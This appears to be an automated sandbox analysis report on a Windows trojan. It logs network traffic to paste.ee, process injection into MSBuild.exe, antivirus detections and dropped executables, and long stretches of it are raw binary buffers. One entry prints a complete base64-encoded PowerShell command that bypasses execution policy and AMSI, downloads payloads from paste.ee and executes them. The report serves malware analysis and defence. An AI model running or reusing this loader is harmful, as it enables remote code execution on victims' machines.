Data received	¯º×Ü;&¨Ø7º0NÇöÜ¢Þ ´²`UÇ" [»,rÄ¤qJêhÆ®{Ã÷ì!4ßÔô¨U@/®`Ìí6#Gn½NDrULpÌÊ6Íx ZYvF<¢uÐÙ£Úù¸ôIH5&J: ·´"ÂÍAÚHkjb ¨4®£:hröÄî 3G7P¡°ºC)Ò° sº9´<Ð=×1a£uø¦Æ`EÉ0÷²\ç¾ ¤Iÿ%£~ÁæK RIVøLÎCgùDùÄ#Þ°#Ë÷$cÈSß×8ªqYêhp¿ÝÝóWYósÇ õ/ÕyL$ùrGuº Ï}Ó}¸Z±\|{ÖJåµ§¸?¥]ëÞÞD2`K\|z½mÿZCÐ^ÂHÑÍn·\|rÈI±17Ì_±(êØ9~@ùzÑ©NÝþ/o2«øÇÕ6oÃJó2õËØÔjÒ¬S,~ÂUkN¯Ìµï>°âdÉQÆé}¬ HWnÌÞ³ÿrA¥YÉöÐ¬òé$¯w 3 ®HGº\t0yõ(û@\ÔoÝóLWeÙ{ \X£æ.VÍHöhÏäáæ!xcWíài»G¯þRÐ¬Âàÿ piA+÷õÃû2ò§B ÿ?IàÎd(JzÜb¹ £©ö²zJã¾{y:¾«{u¤È?A_°ZàÉyÉaPLã9Fnc^[ÚäÇªjW-{Íç½õÓWöÿ!Ô÷åºY?l°!ñ¦Û;þ¤+MÁú¢Ê*stúÍýÖàhÈ"å~?> £ÀØ2o-¿è&UIAàÈ2ðÎÏÐùöömeDhâõì&^¬Æ:(^ïÙØèã¡¯<«Á÷°x'8³gþ]¦C:-BËô¿go=miëQóFé®å<Oé>{èê3<ù¨¶ê V±giáo" }ûFZÑ½Î'T57) ³Ï>mn9ÿ" ðM\|¦P SXIGbú
Data received	ÇùÌMÏiÝskOðþ °¥@É-.ó» å,m¬×r&PòÍ9vàé=(EeÍlÎf£@ aë¥÷gV¼\|qqö\|Ýg::N«ÈîgHh·r E£À?HLà,>Ó`ò,©d×S .«&òùíhH(êVµ²;Ú¦ÅÒ·ÀAhþÓêræe]ÂÔ,`YhMþªn\¢Ê\|°M"ýß±¶9öÞ¾-ÆÑ¹ðoîkJbi#z5ã®ny¯D°ä¹%¬ñ¥nãwÊÝÛQ]¡ggóæ)×ýä?3~)BÁN´vÐ¶MÕþ9é°'ÿ]øãZ±fàÜ(m:PûbûóüSD1wx àp`\cÓNg .Oµ@8ê\§:{QsVéíÕ´ÀpùÆ \|¶CÊEq'\»WN{D®`ÂU©ß±01UÒW«u_Di;Øoã.ÿ=b.Á%ít¸{ÑÍæÈ·0Iù9]j!Koº1:-Í"ä3°ÃÖÖRkJ½¶yzOÂÐîÒëí>G»pÅe³¥>;má.@ú_S!AÄ!P*b @Õ#4½Y¡V±EáaêúXÃ]D¾b²öL.kZBo®«B{?Û[¸óÇÁµó¿h¾eq]Ù-/«¸¹T;q±\|Ä]¢ã¥o¿Ç]ÚÎ:õá¿(TV(]N Ñh
Data received	fg\ Z Þ/ü'co@ô(%7k\|1¯ìQE¼<ùçRY±+¦=X§ø°Õê©ÝEá+fÉøWº¸?þ7þ6®QÿeÁÃ°]¦KB«IlG¾º)äðhW¨6_Äí^À´ýÉË0bñMåáQf' ü¶ÔÁ/ ¤¤Ò¼r)S× ¤«ÍÝßôáÞ3h º 5uÃzÅµïÿßU{ïÓ&4Pb@ª0ºsá'ýEöciì¯û×\|;f Ë·êJ¤ÈÃdèÉp»¤Ä{{côMÔ!xQÙø£ñ<ªrÕáôpÀQÅQûÞÆà¦£W. ·@ ¼!CéêÚ×2qó;z¡g.Ñ¿AÆñÁ;¾nÖyæõC\®òiw¬EsûXÞÂ%¿7ä©ÏAäºêÅ ÂÑü¬ÆU6ÄÞV¿ê«´Ûì1ëlO±Y¬yy_ñiä¼§Akæ)mª¸MÁ%B[éÒÁë\þÍfXm¡åZní ´íùùÕÜ?R[~ögñ þ©µçjÊ¬Ü?-qlH ýýû+¸ÂÜáõAEÇrÎéÖâ m=¸Ñç;3CUzyùûF\),ÌãÄZ<÷G4«Fè{ü -c<°«mýÅfÙäøz»JÞÌ°¸åæ(J°&î&Â®ôajÝUöS¥Kà÷Ááâé~O:QKrvü{ÔÏÛ[ìÀ¯~À®!Å®S!Ìwøà,ïq¿ '÷rO-¸²ðgNNå§ðk74Íç<9 Á¯ýàoö¦YYÍ®ñ¼+¡#WÆÍ¥<ji "fD"ËílÚ-Ø¿fÈ/Ä ;Ø<q¾ÍÝ¤°;yÓ%þSx}gÆqI8úÇØ
Data received	9¶Ùµ(a!¼7fÂk5P¹D9OäQ÷÷§U) ¨ÃõB¾Õá;;ýéòëæÞIë¢Ã1Ô 8< ¡!3g¶çfÇápµÍh´gòà8ò@øÄ¤~ÖüÑòsÅUÞA\E£kò'Ý{Öd"fÃÆH%%¦)f]âËîUkCzá'wß16[ìmåBU¾évöøxbg)¹ TÔ¤ß(apdìçHXaW¬"Mã.0ä3$iÚ¯Ç².êl§)òXaÈ £íï¼§æp<ÀïÐG7.zcÞ»ÈMùCØWs7½ûâ$ _L/héôscú¹JÛ\ìà£}Â>ùý¨l§É]à¢aéMÕøRñknaÒ[«L]=òâQxMwQÓx#ØÅª²çfé2Ï\|Æ-n;Û¼34Yq+¼»NÕ¨F<µ\ZIÑPÐë/ùH6ÉÙ¼]2<ùÌ¥3oucïÝH§Ð¨´5ËYÈ÷ ¦q§»ÁT®Õ PnÛ&Mz"¥ÓÎìX%5Ý¿\\BÖiEzýX#<¶à0ùi aøX4\| ù=ËròÄÕÊ¯ËÉïkÐÒÕÞdú2»¥](±iø¬w§Ù:Yd<¡d°eÎ½/wô¯Ó=$ð\|¯1XGò¸Ã{{wg@Oq ±ªÆîº=ýR{+¬PRZ=ß"3qÇV¢Iï¥eÆásayÐ÷vA998ÏµÐLÅpáÌþ4\¯.HújZ<\ÔÂEÄP[nx°âÓvL#½¡-SQgYQc=·r¯oEúÖBÍ ê Ðb7«c{<Ï«úÏÜ7µDÂj> Rãi¦ZÓ#½}Ó¥éöI æªÍu'=N~¯Â&ôJ9¾AhodáJÍ9=[28ÈãfBÀ½Ã2Ãb]9ßgL"éª½ÙmÙÏõ¹n¦j4")¡à ØK.e6?ÁÙBBê1^IÇt®1ìê.ø4+ÕëpÝTó¬9{9Mmïd(M<Jµ³Ì DÖe"kL½ÑWgPS'¿È×WZ oarâU¤ò¯dó/ÐÝãwíJöÆZ1ûÔmÉ}ÖË7Ñµ(ÎòP~or²µüsPÄþßÃJjP:$Îsbß¹~Ù"Nq+Ë hÁ®,÷éPnÐÎPØOËËLB¥Â´(%Ihë<eÏ·AÒÚ?Ç@1Õ_"úêy©_u¶£#ßg*zk qÀ5C@xô#!óIéõeeEJxð:]kÐßSAQ©ØÖâEzóKXÜÜ:34Yöp3LARÇëÐh¶µ;Ì.'½ÙÐ¬Ò:cÑnÑVÀ¨è²\|3G')«å4ùãän¸Ka0,Æ=ÇãÉW=åÁ½ÜGé§-)lA:ìÍMÌkëð55ªx¦^ßÖ 2!çU=ÿH5QÛ5v¹¦ÁpÆ[í^l·ó¶Uå×í î=ôFd!ý;¦¦Î%"Êó¯»ëç Öù%ýøçbús3ub4D^¿åIÈ;ãìJÙ¿@Ñf¡¿xì!ú¢ôµéOÛFEÞ`CqdI¤ým ¿ýWi
Data received	·äCÓ(LÑÃLÈü»GT¢8:ôòõtâ)¢Ì}gñIÊÑcj T5ë>Úèànþð¾ÒcÇ²ua=d7 ð@wõ\|îâ31Î«+r3?\|ÂàQ@ª¤{°ü½odõU ÄÇPÇIÌæzó}÷%,Â"Ã¦k¿ óíáóä¶øuhêcW%@ó¡(M$(2_2?ÖØëÉPÑA 7 £¡BD&)0ÜÜ¬ìWw8&ú\|ÚÃ%ok ·°Dò6[ÖdÚÿÔA»÷Bí]uìíéïR=¬¬ø,Lñsä òp(íæF;8uÉ¡Â@Ä4z (¯jL=t^6hUàUÔù7çïk°³m¼óòuWÙQG)8µøÍðÌÐn¸7¶¿;¿2 y1q68T1Þ`+2ãC#g5ÃÖõî!©üKK«6¾ÊüÍNy©äo#WUÍU7`¹¦$'zudÇa¶ª\{ÚKEÔoæçÁ8ãZêõks&Áí²PÁ³Q4ÇrYQDeÞù1=K`b®Ø¼#X6ÅqY[zaX9 ð.ØðI<<éh^¬ôXì½(ºJ`ôæNß9ãïåõH*°®ö?ur{d§¤Ã?\|¤j)òDêh$©Å9Åë£¢m^{WeI4kè÷ Eí' 2OÒ]~tÔôóF²GGá)# ÜbfÛÛý·-ÄÁlT2öB©}¥2 øºÙ,7è[/ÚXQDó¦º+©ÌÃ I@ñ}&@UJw7¬&ÍI\|C~hl j9·ÍÂÄÁU<Ò]f ÇHð#zb'>Í>HÌþMCk4Rtú6ûn.QÛ~-% Hóî¯¯î
Data received	-R¥4ÊþÃóH©Ûâh¿×xdçîáä»VI%\|h½³J8%Q»¬ozfXO dg_8ÈÃ³ÔÇ ´²ýA¤Ì¸î«þ~sTË2Î:ÐEÊö´§¾ÉGt9%p>ºèã°ý!¤Â¨ûÒ¨äã9À-«Û0<R×¼û^?B×²!-óìÅÙò k_¦T"½û¬/ÜÃ¾ÅKY@eoµjÎ èöµ Á§J¯sÝ¦¤Oyÿ¥×Ù+,Æk£gälôlàxi3wZùØÅÊIÜÆPÓgz^Öó~O!wýLQ¯°zÞ·,yÓîãÙÛù&É;ªÈ4ÝtÞ_þ-â»U5ö¬k5Ü%'°tAÏeðÀÊMf%4^ùAåÊ²)ò8J]kjeÆ¤¼4cìrïI²ßÖZ}W»DÛ¨ÁÚ¡u6VëûS&¬zÐ£±ÆIÓ][âqzÜ?>Vl÷´xëBÙÎCªþWl=´JàÀE~ ØË)¾&i0´Nj`3³tT_eÀ;îÛInî$©å+Í+ø¦OÚn,Q~àL£úPøNÅIá)zR_ºÀðÍ6ÞT]>Ý·jÔþÀu0××]rÞå5 PÖiìvU}\óÈhGÈ>¾§ó×(K EI46@¼@;n¼#±;~AfÐoÏbT`ñ Ê§ JYµ"l+½j«ãU¯Ä°äÕn(ÍÐìlÕ§¦r {ê½ÃëjpÌ.Fò
Data received	K44&÷ë°HBç¨8Z_Ó¹ d1±Ipñ$Y@(w Æ(^öß!@"xE!r°låÎaS$34VÊomrwÈÕ¡Íèvï Âïs²¨-¿i>µew¯ðxlÙw7à{ASúR ÕÑÐ±±çp÷Ø¹²`à!cUfÝ:ò0?ÕÖ:¶¿àq¬ Åàr?4TjåÓÐAºäÎj·7<ð1/F3´IzÐÏú¢kCRÉâ£Ò¶ð@tG8ÕJhwµáÃ¤"²¡,ÞÞFÆí¼¦Pi3K\|!1]È»áck0E®Ê§}Á"¤%/£Ä+eá¿z"K&Ä<&[eò».ú7eÆÂ¼ð¯¨åÇ'Êí7¯ÚèaëDP;Ó3=ö¡÷ÈSbncëô³¤xôÕhVe>A×wÞ®§E¶'Lhÿý#ªîÚÂOËvu³²yc¸d$úïÌðCúÞÚQóm,¸ªfÔËãñÃgL¤Òé "þñ BúM½ÛU»õ¿¬ ,äP¸Ê)ô1ÀtªÙ"Û\V-¥aý¡UEv`ÔnWv;¤Öf» >ïPZ( íÏÝ¾ØN8üwéç¹Ï¦ ¾«ò4À»)Ñò=GzðúÓ½$¥'ZùZ[Hzæº¥° ïð{dÍq\|Ùrú(Z;~ 7ñ%ÁZY>¶D,¸7co8Z¯ÙpºÂt¦¯P áºâÚØ{>õñ²ÓõgóÄÂgÇ0L½Ñ<"WÒBàçlâ¡²5NÇÉÐðüFÖkÓÊ~<ÉÝ?óÛLc³;×oº¸ôÀ0{\È3pXïp¥rºâ0.Wæµº#!þÀÆøK_$X¦¯c:K²)ü ]ê°3söþ¹`Æ_trc}U¿K¯Î$Å#¥¹åZ NM°?]ðCìTö
Data received	ýûÅ¸;~áfÈu1%êz¼õÖÚ×MÐ¢ÃÅ\|ªGpXøKîsÆÕ::íqA jîMJ8Aõ1³ß<JwÇGò¨I{ï.Õª*Tïqîtä0µÞÌÍ@Ìx²8Ø:÷kcOqqÓiú!ªJ>ÉJQØIºoÆ^Ô`6æZ×Z·8ïZùêÅ°Þ30"QN} iÈx_U½2B?:'G8ü?°Lí¿XwkôØ¯ÚP¡þÎ¢þÃÁ¯P&FYöî×¾NKª2XF¾ë[öV®CzwbÄñÃ<sö¿å0ó0ûÞ>/w_MÐÃ`GúÏÆ V47a²J4£rÜÎJãíòµà3ãßçÕúÞMû¸ZPüuRh¹y¤sì¾¦\Lë¥kÈrä¯eOÚÜèyE"/9ÌnåÚz²OOÈbå`WîÁ@VçÜ¸KözgÇ8¹cTì ¸Xô5û=³o_I?Ü¢{=A0ßò Ã¢ fî&Ïäb±§k<JØO¥Ë÷à#[Tfyð´ íEêÓGçójá<îj8½Èjýd¯°rA;¿ÉºQúðQº³9ÿÄS®ð¡¦ëüqøo"eÇÛsòÇ;;û3ë¬°¬(´¤8Y\|Öoil¼¦ÿnôb;¿WpúOÁÌ mìBuQÌí!S«j- ;ÓVÿTâ¿ {=
Data received	§ ;¥'r%P®lø © ÖÿþÇuë?¬+hàV´=¤ïlºß½H î¨êkö ÜdÁ¸º\|,ÜH4ðJSSÚ¥ÍÁÌ\|ÖèØ8æV[EÒH\|zf£~àmz¯¹+mè`vÈ_«H©£6YòÁ´^ÂÏ)N;`/úHø&éÒ¬6`Ì³Çò¹§\|0.wvw_UñÊ2p\à¥%R¹©nëÊ B·²Ý N$d#fV\|.WßÞ±«]ÚÚB;¨ÚÒ»³æüx-©FH0ÇXvSDÌY!Wmip®RPb/ó±{RÓ"ÄÄYÎOKfåÛë«¥=Ð2ßÌó=ápi4ÅiÈEº}wàKÇtÑù¸ùm ¬½ð¯ü³s}h¶¿Ý3>/ât>û¸9üæx¡)_ªäj¤ýzÒW¦02fõUQÜUî38ëümw"L\|² Rê×ÚE(~¬Ü:PÑA§º~ÒÖ3o½½xó Ö«ß©,Õè H?¾MÑXlP@2 Þ'7®Qû'×9¨F-k>ò ää(²Aç¡,Ç ZºmÏ:UMafk@x@éâØÂÎnÃ4Ëdpõü¿2æç¬jmë%AxÔSi7RÆm¿wLkð¡W0¥ÿa_¼ÍÜ "JÌWëµ2{Ci)[wü.÷ñ dÁo¶þ_Æÿ8hMòG3 t°Í6ùD1$p39¾ÙÆTmÈÞÉN=Î=àEa3äPvèãw ¼}þÀ)ãH)ÓJmå ´G+ÍÎQ+Ò]Ùì³oëqÁ ßG~Ôß&9ZØ-zÛ\´Ô-¦×3,ÜwoBömÔ)LàlI=µWüuÄ¨Ô`0ìÍC) Li×ZCl3ëÇW9Ý_¬rM_¯°pS Sà6E+ã<^ìUj_VóuÂÇ~}û/ß0ql'JÍG>S4¨üWXÁQôFË½\Þ¿PèÒ¼^:øI`íå S¯þê#°S2%Ù
Data received	áæYy) ¿ýÆwY<LUHÄ[C¨çS^ Ñ7%ò¾EnµnÌS£<®"ÝªuRõG5èú=åø\|íìÎ7lRâjÀþfÎQEûë%Èz»dB çÖfdèKúÒitMØíT×1Ið~øê0é,)Ú_²IJ¾Ì9ÐÀ³ÀµÕ¸<rôí®¬vÃ=Z5ë=îh_ÝóðêàJÈÊò°%nçîÈnæÚrYhMV ¢:uÄñÝGh17jS=¿[hµBk p{[ÞMwb÷?}ýoñ BO°ùSá ý#ÀaçF{-±Áî@ýë àÊKÕ×¿ÀÕ»Úºê5)Ì½;ô~·pæ±Úóª7ä¼ÌpY ümÍLðËqÛËZ¿·¨5ÌÞ?1z¨61Ú¬ÓIR=;?àÖ%3dïâ Zk·ÌÒC{VYjÇ%vW}·1Ï!¨©<á\ºÂ=Òs .ã(×£L41ú´ÈY$¿÷1ËÆÀäð¥Q>âI&Ç_-I{Ùøª1,áÉùÅg"óúÑZPHg*±AAG£©åõ»4ïnñöoØäWm:öH¥¥¾váQô¹óÍ3 \¨Iþæ6I¬¹£
Data received

Poweshell is sending data to a remote host (4 events)

Data sent	kg`1Âìrr{3ï¥BßÈ-@-îCå¹Y@\|ýT(zà/5 ÀÀÀ À 28&ÿ paste.ee
Data sent	FBAb¤ûÀÐGõJ¢ÇZèïDC*©x°g½^í#ý¾=;âúà¨éØûmu%C°[Lêìrç¢0¬²ÿÂüZü[üSÑld¸ºkê&£:UQïôtÃFtÕm`¦TeL»
Data sent	` Ä5ÁÉ¤ò$çA>þA¤36«ÀE-ò×î¾WrhW»ÝâyHõxQ¸ý jÔ x é.}óýäÌðÅèzXÁçàEQtI¶AÀF6Wb¹
Data sent	@ q®ãlÉ®óX)( #-ÖFùmý·#ww[6 u§Îè4"³öÓÄ¶Y.) âÖdåTÞ

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 22, 2021, 5:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 22, 2021, 5:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (2 events)

host	142.250.204.110
host	172.217.25.14

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 3752 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000036c	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory April 22, 2021, 5:19 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELqÂ[àH1)@Ñ.text¿~ à base_address: 0x00400000 process_identifier: 3752 process_handle: 0x0000036c	1	1	0
WriteProcessMemory April 22, 2021, 5:19 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3752 process_handle: 0x0000036c	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory April 22, 2021, 5:19 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELqÂ[àH1)@Ñ.text¿~ à base_address: 0x00400000 process_identifier: 3752 process_handle: 0x0000036c	1	1	0

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Doina.7139
FireEye	Gen:Variant.Doina.7139
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.f67eca
Cyren	W32/AutoIt.OR.gen!Eldorado
APEX	Malicious
Kaspersky	UDS:Trojan.Win32.Povertel
BitDefender	Gen:Variant.Doina.7139
Ad-Aware	Gen:Variant.Doina.7139
Sophos	ML/PE-A
McAfee-GW-Edition	BehavesLike.Win32.TrojanAitInject.ch
Emsisoft	Gen:Variant.Doina.7139 (B)
Microsoft	Trojan:Win32/Fuerboos.B!cl
GData	Gen:Variant.Doina.7139
Cynet	Malicious (score: 100)
ALYac	Gen:Variant.Doina.7139
MAX	malware (ai score=81)
TrendMicro-HouseCall	TROJ_GEN.R06CH09DM21

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send April 22, 2021, 5:19 p.m.	buffer: kg`1Âìrr{3ï¥BßÈ-@-îCå¹Y@\|ýT(zà/5 ÀÀÀ À 28&ÿ paste.ee socket: 1488 sent: 112	1	112
send April 22, 2021, 5:19 p.m.	buffer: FBAb¤ûÀÐGõJ¢ÇZèïDC*©x°g½^í#ý¾=;âúà¨éØûmu%C°[Lêìrç¢0¬²ÿÂüZü[üSÑld¸ºkê&£:UQïôtÃFtÕm`¦TeL» socket: 1488 sent: 134	1	134
send April 22, 2021, 5:19 p.m.	buffer: ` Ä5ÁÉ¤ò$çA>þA¤36«ÀE-ò×î¾WrhW»ÝâyHõxQ¸ý jÔ x é.}óýäÌðÅèzXÁçàEQtI¶AÀF6Wb¹ socket: 1488 sent: 101	1	101
send April 22, 2021, 5:19 p.m.	buffer: @ q®ãlÉ®óX)( #-ÖFùmý·#ww[6 u§Îè4"³öÓÄ¶Y.) âÖdåTÞ socket: 1488 sent: 69	1	69

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 6096 called NtSetContextThread to modify thread in remote process 3752
NtSetContextThread April 22, 2021, 5:19 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4204849 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000033c process_identifier: 3752	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
parent_process	powershell.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 6096 resumed a thread in remote process 3752
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 3752	1	0	0

Creates a suspicious Powershell process (2 events)

option	-executionpolicy bypass				value	Attempts to bypass execution policy
option	-executionpolicy bypass				value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
